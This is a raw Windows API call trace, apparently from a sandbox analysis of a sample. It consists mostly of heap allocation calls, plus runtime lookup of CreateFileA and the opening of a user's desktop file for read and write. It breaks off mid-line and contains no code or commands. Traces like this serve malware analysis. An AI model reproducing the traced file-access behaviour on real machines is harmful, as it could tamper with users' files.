[0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0077.089] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0077.089] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0077.089] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.090] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.091] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0077.092] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.093] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.094] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76a970 [0077.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76a970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.095] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a970 [0077.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76a970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.095] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0077.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0077.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0077.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", cchWideChar=48, lpMultiByteStr=0x692d08, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpUsedDefaultChar=0x0) returned 48 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.096] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9mgct.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0077.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=48, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b820 [0077.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=48, lpWideCharStr=0x75b820, cchWideChar=48 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3") returned 48 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b820 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 